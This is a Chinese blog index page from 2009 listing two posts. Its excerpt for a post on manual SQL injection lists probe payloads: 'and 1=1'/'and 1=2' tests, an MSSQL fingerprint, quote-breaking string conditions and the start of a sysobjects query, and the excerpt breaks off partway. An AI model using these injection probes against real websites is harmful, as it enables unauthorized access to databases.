SQL命令整理
该文被密码保护。 阅读全文
posted @ 2009-08-27 16:32 巴顿 阅读(2) 评论(0) 推荐(0) 编辑
手动注入脚本命令
摘要:
1.判断是否有注入;and1=1;and1=2 2.初步判断是否是mssql;anduser>0 3.注入参数是字符’and[查询条件]and’’=’ 4.搜索时没过滤参数的’and[查询条件]and’%25’=’ 5.判断数据库系统 ;and(selectcount(*)fromsysobjec... 阅读全文
posted @ 2009-08-27 16:31 巴顿 阅读(244) 评论(0) 推荐(0) 编辑